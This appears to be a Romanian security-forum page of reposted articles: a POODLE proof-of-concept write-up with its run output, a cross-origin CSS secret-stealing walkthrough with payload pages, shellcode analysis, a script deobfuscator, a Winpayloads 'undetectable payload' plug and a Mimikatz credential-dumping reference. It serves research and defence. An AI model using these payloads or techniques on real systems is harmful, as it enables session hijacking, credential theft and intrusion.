Nytro

REcon 2015 Link:

((void (*)(void))shellcode)(); Defineste un pointer la o functie care nu returneaza nimic, nu are niciun parametru, are adresa "shellcode" si o apeleaza. Dar tot e necesar ca zona respectiva de memorie sa fie marcata ca "RWX" cu VirtualProtect. Exemplu: https://www.exploit-db.com/exploits/38959/

Winpayloads - Python2.7 Undetectable Windows Payload Generation with extras Running on Python2.7 Getting Started git clone https://github.com/Charliedean/Winpayloads.git cd Winpayloads ./setup.sh Will Setup Everything Needed for Winpayloads Start Winpayloads ./winpayloadsReadme not finished Sursa: https://github.com/Charliedean/Winpayloads

Implementing the POODLE Attack Mi 13 Mai 2015 By Thomas Patzke The POODLE attack gained my attention, as it was disclosed some time ago. An exploit has to act at different positions (victim browser, HTTP request generator and TLS proxy) in a coordinated way and it includes an interesting bit of broken cryptography. Furthermore I asked myself, how practicable this attack is and what the obstacles in buildung an exploit for it are. This writeup is about the experiences I have made while developing a Proof of Concept script for POODLE testing it. You can get the source code here. Related Work During my work other people released some Proof of Concept code of the POODLE attack. The projects can be found on GitHub here and here. As far as I can see, both do not implement the request generator that is running inside the victims browser. Many other people developed checks for the POODLE vulnerability. Most code checks for SSLv3 support with CBC cipher usage. I wrote a check based on PolarSSL, which checks the behavior of a TLS/SSL server on broken padding. This can also be used to verify vulnerable TLS implementations. Implementation The picture below gives a rough overview about of the implemented Proof of Concept code: The implemented parts are: A request generator, that runs in the victims browser. This can be injected in web pages requested via HTTP and was implemeted as static JavaScript file (POODLEClient.js). A HTTP server that serves the static request generator code and answers requests from the request generator regarding the parameters of the generated HTTPS requests to the attack target server. The Python module http.server was used here. A TLS Proxy that modifies the intercepted TLS packets of the generated HTTPS requests and checks the response of the server for them. The module socketserver was used. Some state has to be shared between TLS Proxy and HTTP server. Because both are running in different threads, the Python classes Manager and BaseManager from multiprocessing.managers were used to create object instances that are accessible from different threads and even remotely. Never used that before, nice Python feature The implemetation itself follows the description of the paper: Degrade TLS protocol usage to SSLv3 by disruption of TLS handshake attempts. Justify the URL and POST length such that the last block of the ciphertext is padding. This is done by increasing the POST body size by one byte until the cipher text extends by a block size. Perform the copy operation on every generated TLS packet and calculate the leaked byte if the server accepts the modified packet. If you are interested in the details, just read the really good paper linked above! One obstacle I have encountered was, that the length of the POST body can unexpected influence the overall length of the plain text by the Content-Length HTTP request header, when the length of the body drops below 10 (or theoretically exceeds 100). This condition is circumvented by usage of body lengths of minimum 26 as start value. The minimum POST length while phase 3 of the attack is then 10 when a 16 byte block is shifted to the first byte. Another odd looking behaviour is, that the first TLS application data record only contains one plain text byte. This is a countermeasure against exploitation of the BEAST vulnerability. To make things simple, the POODLE PoC only handles application data records that exceed a certain size. Optimization Potential The PoC implementation of the attack is far from being optimal. Every generated request requires an additional HTTP roundtrip to ask the HTTP server for the next requests parameters, even when the parameters change only after a plaintext byte has leaked in the decryption phase. Test Environment The PoC is entirely written in Python 3.2. I developed and tested it on a recent version of Kali Linux. Because my preferred browser, Firefox, is not vulnerable against POODLE in current versions, I have used the following about:config parameters to get the vulnerability back for development and testing purposes: security.tls.version.min = 0 security.tls.version.max = 0 security.tls.version.fallback-limit = 0 security.ssl3.*_rc4_* = false A script TestHTTPServer.py was created as attack target server. The SSLv3 listener was created with socat as follows: socat -v -x OPENSSL-LISTEN:4433,verify=0,method=SSLv3,cert=cert-poodle.pem,key=key-poodle.pem,reuseaddr,fork TCP:localhost:4080 It forwards the received connections to the HTTP server. Usually the PoC script deduces the MitM config from the target URL. The traffic has to be redirected by appropriate iptables rules or similar. For testing the following command line was used to avoid MitM hassle: ./poodle.py --target-port 4433 --start-offset 384 https://localhost:8443 I have created a script poodle-dev.sh, that starts these components. Just run the following commands in different terminals or as background jobs: ./poodle-dev.sh httpserver ./poodle-dev.sh sslserver ./poodle-dev.sh attacker-nodebug The attack is performed by requesting the URL http://localhost:8000 from a vulnerable browser. No user interaction is required, as long as the page remains open somewhere in the browser. Do not forget to accept the test certificates (in the demo environment at https://localhost:8443) in your browser before you start. XMLHttpRequests will fail elsewhere. This is how an attack looks like: $ ./poodle.py --target-port 4433 --start-offset 384 https://localhost:8443 Starting SSL/TLS server on :8443 forwarding to localhost:4433 Starting HTTP server on :8000 generating requests to https://localhost:8443 Decrypted byte 384: C (0x43) in 8.1950 seconds with 57 requests Victim now leaked 1 bytes: "C" 57 requests and 8.195 seconds per leaked bytes, 57 requests and 8.195 seconds total Decrypted byte 385: o (0x6f) in 56.7356 seconds with 405 requests Victim now leaked 2 bytes: "Co" 231 requests and 32.465 seconds per leaked bytes, 462 requests and 64.931 seconds total Decrypted byte 386: o (0x6f) in 73.1930 seconds with 519 requests Victim now leaked 3 bytes: "Coo" 327 requests and 46.041 seconds per leaked bytes, 981 requests and 138.124 seconds total Decrypted byte 387: k (0x6b) in 36.4802 seconds with 259 requests Victim now leaked 4 bytes: "Cook" 310 requests and 43.651 seconds per leaked bytes, 1240 requests and 174.604 seconds total Decrypted byte 388: i (0x69) in 54.8990 seconds with 387 requests Victim now leaked 5 bytes: "Cooki" 325 requests and 45.901 seconds per leaked bytes, 1627 requests and 229.503 seconds total Decrypted byte 389: e (0x65) in 14.2407 seconds with 99 requests Victim now leaked 6 bytes: "Cookie" 287 requests and 40.624 seconds per leaked bytes, 1726 requests and 243.744 seconds total Decrypted byte 390: : (0x3a) in 34.2510 seconds with 240 requests Victim now leaked 7 bytes: "Cookie:" 280 requests and 39.714 seconds per leaked bytes, 1966 requests and 277.995 seconds total Decrypted byte 391: (0x20) in 56.8563 seconds with 366 requests Victim now leaked 8 bytes: "Cookie: " 291 requests and 41.856 seconds per leaked bytes, 2332 requests and 334.851 seconds total Decrypted byte 392: s (0x73) in 3.6992 seconds with 26 requests Victim now leaked 9 bytes: "Cookie: s" 262 requests and 37.617 seconds per leaked bytes, 2358 requests and 338.550 seconds total Decrypted byte 393: e (0x65) in 8.4984 seconds with 59 requests Victim now leaked 10 bytes: "Cookie: se" 241 requests and 34.705 seconds per leaked bytes, 2417 requests and 347.048 seconds total Decrypted byte 394: s (0x73) in 4.5597 seconds with 31 requests Victim now leaked 11 bytes: "Cookie: ses" 222 requests and 31.964 seconds per leaked bytes, 2448 requests and 351.608 seconds total Decrypted byte 395: s (0x73) in 16.6020 seconds with 118 requests Victim now leaked 12 bytes: "Cookie: sess" 213 requests and 30.684 seconds per leaked bytes, 2566 requests and 368.210 seconds total Decrypted byte 396: i (0x69) in 3.8552 seconds with 27 requests Victim now leaked 13 bytes: "Cookie: sessi" 199 requests and 28.620 seconds per leaked bytes, 2593 requests and 372.065 seconds total Decrypted byte 397: o (0x6f) in 1.4442 seconds with 10 requests Victim now leaked 14 bytes: "Cookie: sessio" 185 requests and 26.679 seconds per leaked bytes, 2603 requests and 373.510 seconds total Decrypted byte 398: n (0x6e) in 11.4498 seconds with 82 requests Victim now leaked 15 bytes: "Cookie: session" 179 requests and 25.664 seconds per leaked bytes, 2685 requests and 384.959 seconds total Decrypted byte 399: i (0x69) in 39.2923 seconds with 279 requests Victim now leaked 16 bytes: "Cookie: sessioni" 185 requests and 26.516 seconds per leaked bytes, 2964 requests and 424.252 seconds total Decrypted byte 400: d (0x64) in 35.4133 seconds with 252 requests Victim now leaked 17 bytes: "Cookie: sessionid" 189 requests and 27.039 seconds per leaked bytes, 3216 requests and 459.665 seconds total Decrypted byte 401: = (0x3d) in 23.1957 seconds with 166 requests Victim now leaked 18 bytes: "Cookie: sessionid=" 187 requests and 26.826 seconds per leaked bytes, 3382 requests and 482.861 seconds total Decrypted byte 402: s (0x73) in 7.3688 seconds with 53 requests Victim now leaked 19 bytes: "Cookie: sessionid=s" 180 requests and 25.802 seconds per leaked bytes, 3435 requests and 490.229 seconds total Decrypted byte 403: u (0x75) in 47.2784 seconds with 336 requests Victim now leaked 20 bytes: "Cookie: sessionid=su" 188 requests and 26.875 seconds per leaked bytes, 3771 requests and 537.508 seconds total Decrypted byte 404: p (0x70) in 2.2508 seconds with 16 requests Victim now leaked 21 bytes: "Cookie: sessionid=sup" 180 requests and 25.703 seconds per leaked bytes, 3787 requests and 539.759 seconds total Decrypted byte 405: e (0x65) in 17.8258 seconds with 127 requests Victim now leaked 22 bytes: "Cookie: sessionid=supe" 177 requests and 25.345 seconds per leaked bytes, 3914 requests and 557.584 seconds total Decrypted byte 406: r (0x72) in 1.7210 seconds with 12 requests Victim now leaked 23 bytes: "Cookie: sessionid=super" 170 requests and 24.318 seconds per leaked bytes, 3926 requests and 559.305 seconds total Decrypted byte 407: s (0x73) in 71.9293 seconds with 515 requests Victim now leaked 24 bytes: "Cookie: sessionid=supers" 185 requests and 26.301 seconds per leaked bytes, 4441 requests and 631.235 seconds total Decrypted byte 408: e (0x65) in 35.3999 seconds with 253 requests Victim now leaked 25 bytes: "Cookie: sessionid=superse" 187 requests and 26.665 seconds per leaked bytes, 4694 requests and 666.635 seconds total Decrypted byte 409: c (0x63) in 0.7939 seconds with 5 requests Victim now leaked 26 bytes: "Cookie: sessionid=supersec" 180 requests and 25.670 seconds per leaked bytes, 4699 requests and 667.429 seconds total Decrypted byte 410: r (0x72) in 46.0715 seconds with 326 requests Victim now leaked 27 bytes: "Cookie: sessionid=supersecr" 186 requests and 26.426 seconds per leaked bytes, 5025 requests and 713.500 seconds total Decrypted byte 411: e (0x65) in 1.9057 seconds with 12 requests Victim now leaked 28 bytes: "Cookie: sessionid=supersecre" 179 requests and 25.550 seconds per leaked bytes, 5037 requests and 715.406 seconds total Decrypted byte 412: t (0x74) in 21.2495 seconds with 151 requests Victim now leaked 29 bytes: "Cookie: sessionid=supersecret" 178 requests and 25.402 seconds per leaked bytes, 5188 requests and 736.655 seconds total Observations Attack Performance I performed several runs in the above local test environment and measured the time to succesfully leak 8 bytes. The minimum was 240 seconds, most attempts took 300 seconds or longer. As mentioned above, there is some improvement potential for the PoC, but in reality an attacker would not have the performance of a loopback network device ;-) Exploitability of Current Browser Versions Current versions of Mozilla Firefox and Google Chrome are safe. They reject to connect with SSLv3 when TLS failed previously. Internet Explorer 11 starts with TLSv1.2 but allows degradation to SSLv3 by connection interruption. Detection of the Attack The traffic that occurs is quite unusual. The following suspisious properties can be observed: The termination of attempts to communicate with TLS 1.0 and higher. Cipher texts with two same blocks. A huge amount of HTTPS requests, that are terminated with an encrypted TLS alert message before a response can be sent. Conclusion: POODLE attack attempts are detectible at network layer. Conclusions It is quite simple: SSLv3 must die!. The protocol was superseded in 1999 by TLSv1.0. Browsers that rely on it due tolack of support for TLS are IE6 or Opera 4. Whoever still uses this browsers, has much more security issues than POODLE. Keeping SSLv3 enabled for customers that use these browsers means that the security of users with newer browsers is degraded. Simply: disable it. When offering websites via insecure HTTP it is possible for a MitM attacker to inject malicious JavaScript code into pages, which is required for the POODLE attack (request generator). Therefore the usage of insecure HTTP should be reduced as much as possible. CRIME is another vulnerability that requires the attackers code to be executed in the victims browser. Thanks to Daniel Sauder for proofreading and testing! Thanks to Danopoulos Nikos for pointing me to some typos. Sursa: https://patzke.org/implementing-the-poodle-attack.html

Script Deobfuscator Released Posted on February 15, 2016 by darryl The purpose of this tool is to help you perform static analysis on obfuscated scripts. It’s often easier to dynamically analyze scripts but there are times when you just don’t know where to start or you just want a high-level view of what’s going on with the script. This tool may be able to help you. I already wrote a tool called PHP Script Decoder but this new version has been re-written in .NET with new functionality and flexibility in order to handle PHP, Javascript, VBA, and VBS scripts. To explain how to use this tool, let me show you how to tackle seven different obfuscated scripts. Example #1 (unphp) Here’s what the script looks like. Looking at the script, you’ll see an array of base64-encoded strings at the top. Following that are references to specific elements from the array. Paste in the script sections like so. The script you are trying to deobfuscate is at the top. The array of base64-encoded strings separated by commas in the middle section. I enter the search string value of “_705650624(#)” since that’s how the script at the top references the elements from the array (note: the pound sign is a wildcard and must be present). I select the “Array” method and click on the “Convert” button. The results still show encoded strings so now I check the “Base64 Decode”, “Concatenate”, and “Keep Quotes” options and try again. The script has been deobfuscated and much easier to read. The script won’t execute though because the strings are quoted (or unquoted) incorrectly. Example #2 (ddecode) Here’s the script we’ll be working on: First we need to unescape it so click on the “Unescape” button. If you right-click on the Output box, there’s an option to save the results to a text file. (You can right-click on the Input box and read in a file too.) Click on “Copy Output to Input” to move the result to the top. This script uses randomize variable names and assigns a value to it. The later portion references the value. The tool will parse the script and load each variable and associated value into an array. It then does a search for the variable and replaces it with the value. Choose the “Random Vars 1” method. The delimiter for this script is a semi-colon and for the search string I enter ${“GLOBALS”}[“#”]=”*”; The pound sign is a placeholder for the variable name and the asterisk is the placeholder for the value. Here’s the result: Example #3 (unphp) This script also uses random variable names but in this version, the strings are base64-encoded. The top portion defines the global variables while the lower section, beginning at “session_start()”, references them. Paste the script sections in the tool as follows then choose the “Random Vars 2” method and the “Base64 Decode” and “Keep Quotes” options. Note the search string has spaces in between so that it matches the script at the top. Example #4 (unphp) Here’s what the script looks like (I highlighted the key): This script references an element in an array to build the values for its variables. The elements are based on the character position in the key. The first step is to paste the entire script in the input box and choose the key lookup option. I use $f9[#] as the search string. In the Lookup Key box, paste the key and remove the starting and ending quotes. Also make sure the key you paste in has been properly escaped. You can see there’s concatenation going on so check the “Concatenate” option. Example #5 (ddecode) In this example, we’re just interested in decoding the base64 strings. Copy the entire script to the Input box, choose the “Base64” method as well as the “Base64 Decode”, “Concatenate”, and “Keep Quotes” options. Make sure the delimiter and search string matches that of the script. Example #6 (pastebin) This script is uses the Joomla exploit and contains decimal values making it tough to see immediately what this does. Paste the script into the Input box and choose the “ASCII” method. Almost but it’s not concatenated. If you choose the “Concatenate” option, it won’t clean up everything. In the “Output Options” section, there’s a “Remove Chars” box. Enter a period and try again. Example #7 (pastebin) This last example is a VBA script. It does a simple math calculation then the result is convert to its ASCII character equivalent. Paste the script in and choose the “Math” method. The result shows decimal values but not the text equivalent. So enter “chr(” into the “Pre Str” box and a closing parenthesis in the “Post Str” box. Look familiar? Now we can use the “ASCII” method to get the characters. I also entered an ampersand and space character in the “Remove Chars” box. The resulting deobfuscated script will probably error out if you try executing it. Again, all this tool will do is try to make the script readable so you can better understand it. You may need to use this tool on parts of the script then put them back together yourself to figure things out. I tried to make the functions in this tool flexible and generic enough to handle whatever scripts come your way. However, if you encounter something new, please let me know. You can get the tool here. Happy reversing! Sursa: http://www.kahusecurity.com/2016/script-deobfuscator-released/

Dynamic shellcode analysis In this article, we will study a shellcode using dynamic analysis. This analysis includes a description of Miasm internals, which explains its length. The shellcode is in the archive dyn_sc_shellcodes.zip, protected with the password infected. The final script is here: dyn_sc_run.py Overview: First blood Symbolic Execution Emulation Deeper in the Shellcode Party Hard Final words This analysis is based on Miasm revision 2cf6970. First blood Here is a raw dump of the shellcode: 00000000 50 59 49 49 49 49 49 49 49 49 49 49 49 49 49 49 |PYIIIIIIIIIIIIII| 00000010 49 49 37 51 5a 6a 41 58 50 30 41 30 41 6b 41 41 |II7QZjAXP0A0AkAA| 00000020 51 32 41 42 32 42 42 30 42 42 41 42 58 50 38 41 |Q2AB2BB0BBABXP8A| 00000030 42 75 4a 49 62 78 6a 4b 64 58 50 5a 6b 39 6e 36 |BuJIbxjKdXPZk9n6| 00000040 6c 49 4b 67 4b 30 65 6e 7a 49 42 54 46 6b 6c 79 |lIKgK0enzIBTFkly| 00000050 7a 4b 77 73 77 70 77 70 4c 6c 66 54 57 6c 4f 5a |zKwswpwpLlfTWlOZ| 00000060 39 72 6b 4a 6b 4f 59 42 5a 63 48 68 58 63 59 6f |9rkJkOYBZcHhXcYo| 00000070 59 6f 4b 4f 7a 55 76 77 45 4f 67 6c 77 6c 43 72 |YoKOzUvwEOglwlCr| ... We can note that this shellcode is in pure ascii. Let’s disassemble its first basic block: python miasm/example/disasm/full.py -m x86_32 shellcode.bin --blockwatchdog 1 This gives the following graph (file graph_execflow.dot): First basic block of the shellcode Note the PUSH EAX POP ECX to mimic a MOV ECX, EAX, keeping a pure ascii encoding. As we can see, the shellcode starts with some computations, and willxor a memory cell: 00000019 XOR BYTE PTR [ECX+0x30], AL We could analyze it manually or dynamically. For the exercise, we will try to determine which pointer is manipulated here. Now, the question is: where does the value ECX + 0x30 point to? In Miasm, there are at least two ways to answer this: using a symbolic execution from the beginning to retrieve the equation of ECX at address 0x19 using the DependencyGraph, whose goal is to track all the lines which participate to the value of a selected variable. We won’t introduce this module here, because a future post will be dedicated to it. Articol complet: http://www.miasm.re/blog/2016/02/12/dynamic_shellcode_analysis.html

Stealing Secrets with CSS : Cross Origin CSS Attacks In this post I'm going to discuss a web attack that was designated CVE-2015-5826 and CVE-2015-1287 which abuses the way CSS parsing works in some browsers and expands the way we think about HTML injection attacks. Introduction CSS Cross Origin attacks work by constructing CSS style-sheets from vulnerable pages and extracting sensitive information from these pages in the form of CSS property attributes. Vulnerable pages include anything page that allows an attacker to inject arbitrary printable unhindered alphanumeric text including braces, brackets and parenthesis; basically any subset of the ASCII table that allows you to construct valid CSS. Attacks with an even more restricted character set may be possible depending on the content of the vulnerable page. Most modern browsers including Firefox, Chrome and Opera have recently included defenses for this attack although to outdated browsers this attack still poses a threat. In order to have an HTML page treated as CSS the browser needs to operate in Quirks Mode, the following section explains what and how this "mode" is. Quirks Mode CSS parsers can be configured to run in a "greedy" or "best effort" mode; in which they ignore anything that isn't CSS syntax and gobble up everything else in an effort to deliver as user friendly and backward compatible experience as possible (if I had a 1 cent for every time a user experience decision caused a security vulnerability...). The idea comes from the days when browsers were far and few between (there was basically Netscape and Microsoft Explorer) and this meant there was little in the way of standardizing web scripting, well there wasn't any need to. The W3C then introduced standards in order to try (as futile as that try was) to civilize the web to some extent, but this meant that if browsers adopted these standards cold turkey there would be tons of web pages written according the old lore that would not work anymore; thus a special operating mode was introduced to accommodate these pages. This "special operating" mode is called Quirks mode and can be triggered by starting off an HTML document with an invalid Document Type Declaration. For some browsers quirks mode introduces behavior more interesting than just ignoring faulty CSS, it affects the way Content-Type headers are interpreted. For instance in quirks mode, if CSS is loaded or referenced in a link or style element the Content-Type header will be ignored and the content returned will be interpreted as CSS! To quote: Stylesheets linked in the document with an advisory mime type of text/css will still be treated as CSS even if the server gives a Content-Type header other than text/css. -- https://developer.mozilla.org/en-US/docs/Mozilla_Quirks_Mode_Behavior Of course what that means is that any kind of document can then be treated as CSS, which means as an attacker if you can inject a document into a style-sheet reference it gives him/her tremendous freedom! You might even be able to have an inject-able HTML document be treated as CSS itself That last sentence was pretty important, its actually the realization that this post is trying to share with you, if you don't completely get it please re-read it until you do. Besides Quirks Mode ofcourse there's the full on standards compliant mode called Standards mode; this is only engaged when an HTML document is started with a valid DTD. So if an HTML document starts off with a DTD that looks like this : <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> or any other valid DTD it will parse the entire document in Standard Mode. And the following DTDs are examples that will trigger quirks mode most modern browsers: <!DOCTYPE html PUBLIC > <!DOCTYPE html BLAH> <!DOCTYPE> Basically any non-valid DTD. You can check which mode a browser is parsing HTML by inspecting the document.compatMode property via JavaScript; as follows: document.compatMode == "CSS1Compat" ? "Browser is in Standards Mode" : "Browser is in Quirks Mode" Here's some screenshots of that little script in action with some examples of DTDs that trigger the two parsing modes: Browser parsing in Standards mode Browser Parsing in Quirks Mode And here's a summary of how different browsers behave according to my research on the subject: Summary of how browsers respond to some DTDs for HTML *Q - Quirks Mode *S - Standards Mode *Tests were done using Firefox 44.0.2, Opera 35.0, Chrome 48.0 Obviously upon finding out that Quirks Mode will force browsers to ignore content type headers I had to check it out for myself, here's a couple screenshots of me doing that: In the screenshot above we can see Firefox loading up the HTML page shown in the bottom right, which references the CSS shown in the bottom left. I'm using PHP to force my Apache2 web server to return a Content-Type header of text/plain which means its just basic text. And as you can see the browser's console appropriately warns us that some text is trying to be loaded as CSS. Exactly the same situation as the previous screenshot except that the DTD of the HTML page being loaded forces the browser into Quirks Mode and as a result the CSS (being served with a text/plain Mime type) is parsed and applied to the text on the page! The Setup So that is the awesomeness that is Quirks Mode, lets talk about the vulnerability for a second. In this scenario we have a simple page vulnerable to injection. We need to clear a few rules of engagement here though, when I say "vulnerable to injection" I mean the following: only alphanumeric,quotes ",' and braces {}, brackets [] and parenthesis () we can exclude any active content injection from this case as well In this example I'm using the same origin to host the attack page, this is merely for demonstration purposes and because all the browsers I currently have include protections for the attack. So basically you have a page in which you can influence the text content. Where's the page I'm going to use for this demonstration: <?php echo " <!DOCTYPE html asfdasfdadf> <html> <head> <link rel=\"stylesheet\" href=\"incorrectMime.php?type=plain\"> </head> <div id=\"text\"> This text should be red <br> </div> Injection point: ".$_GET["injectme"]." secret goes here'} </html>"; ?> view rawinjectme.php hosted with ❤ by GitHub Obviously there is no hindrance here to a full on XSS attack, you would just need to imagine that there's some hectic WAF blocking anything that could be used to execute XSS. The Attack The Attack works as follows, we want to bypass same origin policy in order to steal the secret embedded on the page. You can think of this secret as a Cross Site Request Forgery (CSRF) token, credit card number, password etc. We are going to do this by forcing our victims browser to use the inject-able page as CSS on a page we control. The attack will extract the information by having the piece of information we are targeting interpreted as an attribute of a CSS property i.e. a font-family name or background image URL value. So in summary the attacker prepares a page that includes the vulnerable page as a style sheet, and extracts the information (usually using JavaScript). Lets see how this works Payload We're going to use the following injection payload: %0A{}.extract{font-family:' this will cause the page to render as follows: <!DOCTYPE html asfdasfdadf> <html> <head> <link rel="stylesheet" href="incorrectMime.php?type=plain"> </head> <div id="text"> This text should be red <br> </div> Injection point: {}extract{font-family:' secret goes here'} </html> view rawinjectme.html hosted with ❤ by GitHub Which means we effectively have a page that when interpreted as CSS will have a font-family name of "secret goes here". It looks good, all we need to do now is host this injected page on a page under our control and extract the CSS property using JavaScript. Extraction In order to get hold of the font-family name we just created we need to host the injected page as a CSS Stylesheet also remembering that we need to force the style sheet to be loaded under Quirks Mode! So pay attention to the DTD of the attack page. Here's the little page I prepared for this example: <!DOCTYPE afdssadfsafdd> <html> <head> <link charset="utf-8" type="text/css" rel="stylesheet" href="injectme.php?injectme=%0A{}extract{font-family:'"> </head> <body> adsfassdf </body> </html> view rawxcs_attack.html hosted with ❤ by GitHub Once its loaded up we can extract any CSS properties by using the following DOM path: document.styleSheets.cssRules[j].cssText Where i,j are the indices needed to reach the desired cssText property. In our case it will be i=j=0. Where's what it looks like when the information has been extracted correctly and loaded up into the DOM for extraction: Secret extracted successfully as a font-family name Boom! Secret extracted game over References and Further Reading Lin-Shung Huang, Lin-Shung Huang, Chris Evans, Collin Jackson; Protecting Browsers from Cross-Origin CSS Attacks https://www.linshunghuang.com/papers/css.pdf [ACM Conference on Computer and Communications Security (CCS) 2010] Wikipedia , Quirks Mode https://en.wikipedia.org/wiki/Quirks_mode [retrieved 2/14/2016] @filedescriptor Cross-Origin CSS Attacks Revisited (feat. UTF-16) http://blog.innerht.ml/cross-origin-css-attacks-revisited-feat-utf-16/ [retrieved 2/14/2016] Mozilla Developer Network, Quirks Mode and Standards Mode https://developer.mozilla.org/en-US/docs/Quirks_Mode_and_Standards_Mode [retrieved 2/14/2016] Mozilla Developer Network, Mozilla Quirks Mode Behavior https://developer.mozilla.org/en-US/docs/Mozilla_Quirks_Mode_Behavior [retrieved 2/14/2016] CVE-2015-5826 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5826 CVE-2015-1287 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1287 Posted by Keith Makan at 11:00 Sursa: http://blog.k3170makan.com/2016/02/stealing-secrets-with-css-cross-origin.html

Security Harden CentOS 7 This HowTo walks you through the steps required to security harden CentOS 7, it’s based on the OpenSCAP benchmark, unfortunately the current version of OpenSCAP that ships with CentOS does not offically support CentOS CPE’s. But there is a “workaround” that will allow OpenSCAP + OpenSCAP workbench to run on CentOS, I’ll document this in a separate post. Based on a Minimal Install To follow this guide you will need a minimal CentOS 7 install, ideally using the Kickstart file below or copying it’s partition layout. Installing CentOS 7 using a minimal installation reduces the attack surface and ensures youonly install software that you require. This guide only covers the base system + SSH hardening, I will document specific service hardening separately such as HTTPD, SFTP, LDAP, BIND etc… In the section related to removing unrequired services, if you installed a minimal centos 7 install, you’ll likely have nothing to remove or disable - I’ve included this section for completeness. Articol complet: https://highon.coffee/blog/security-harden-centos-7/

Am ascuns link-urile pentru Guests.

Pe un port "asculta" un program. Adica un program foloseste acel port. Daca este portul 3306, inseamna (probabil, nu neaparat) ca este un server de MySQL. Daca este 21, inseamna ca este un server de FTP care ruleaza pe acel server. Acum, daca ruleaza, nu inseamna ca poti face ce vrei acolo. Fiecare program dintr-acesta, poate sa fie vechi si sa aiba anumite vulnerabilitati. De exemplu, pe serverul MySQL poate te poti conecta cu user-ul "root" si fara parola. Dar daca are parola si nu o stii si daca este updated, nu prea ai ce ii face. La fel e si cu celelalte. Cauta pe Google informatii despre protocoalele FTP, SMTP... Si vezi cam ce fac.

Nu cred ca are rost sa complicam lucrurile, cred ca in maxim 1-2 luni, o sa fie reindexate. Probabil o sa fie niste puncte minus pentru SEO, dar ne revenim noi.

Unofficial Guide to Mimikatz & Command Reference Mimikatz Command Reference Version: Mimikatz 2.0 alpha 20151113 (oe.eo) edition [11/13/2015] Page last updated: 1/05/2016 Introduction: It seems like many people on both sides of the fence, Red & Blue, aren’t familiar with most of Mimikatz’s capabilities, so I put together this information on all the available commands I could find. I plan to update as I can with additional content about the most useful commands. This way both Red & Blue teams better understand the full capability and are better able to secure the enterprises they are hired to protect. I developed this reference after speaking with a lot of people, hired to both defend, and attack, networks and I learned that outside of a couple of the top 3 used Mimikatz commands, not many knew about the full capability of Mimikatz. This page details as best as possible what each command is, how it works, the rights required to run it, the parameters (required & optional), as well as screenshots and additional context (where possible). There are several I haven’t delved fully into, but expect to in the near future. While I will continue to post articles to ADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as possible. This information is provided to help organizations better understand Mimikatz capability and is not to be used for unlawful activity. Do NOT use Mimikatz on computers you don’t own or have been allowed/approved to. In other words, don’t pen-test/red-team systems with Mimikatz without a “get out of jail free card”. This page and all content contained within is not to be reproduced in whole or part without express written consent by this page’s author. I did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from using Mimikatz, reading the source code, conversations with Benjamin, his blog & GitHub pages, and my own work/research. Any errors on this page are my own only. Send comments/kudus here. Many thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved the security of Windows, especially Windows 10. Mimikatz Overview: Mimikatz is one of the best tools to gather credential data from Windows systems. In fact I consider Mimikatz to be the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French most of the resources describing Mimikatz usage is in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage. Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). The Mimikatz.exe contains, or at least should contain, all capability noted there. Mimikatz capability can be leveraged by compiling and running your own version, running the Mimikatz executable, leveraging the MetaSploit script, the official Invoke-Mimikatz PowerShell version, or one of the dozen of Mimikatz PowerShell variants (I happen to be partial to PowerShell Empire, because Empire is awesome!). The Mimikatz source code and release binaries are available on GitHub and is licensed under Creative Commons with the following detail: You are free to: * Share — copy and redistribute the material in any medium or format * Adapt — remix, transform, and build upon the material * for any purpose, even commercially. The licensor cannot revoke these freedoms as long as you follow the license terms. Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits. Mimikatz Author(s): Benjamin DELPY gentilkiwi, you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) DCSync function in lsadump module was co-written with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website (http://www.mysmartlogon.com ) “Official” Mimikatz Links: Mimikatz GitHub Location (Source Code) Mimikatz Releases (includes binaries) Mimikatz GitHub Wiki (Documentation, some of which is reproduced here) GentilKiwi Blog (much of it is in French, use Chrome/other for translation) Mimikatz & Credentials: After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn’t prompted each time resource access is requested. The credential data may include NTLM password hashes, LM password hashes (if the password is <15 characters), and even clear-text passwords (to support WDigest and SSP authentication among others. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. By default, Windows Server 2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory. This functionality was also “back-ported” to earlier versions of Windows (Windows 7/8/2008R2/2012) in kb2871997, though in order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled): HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD) This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem. Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capability to be run remotely. This include running Mimikatz remotely against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, the latest feature to grab password data for any Active 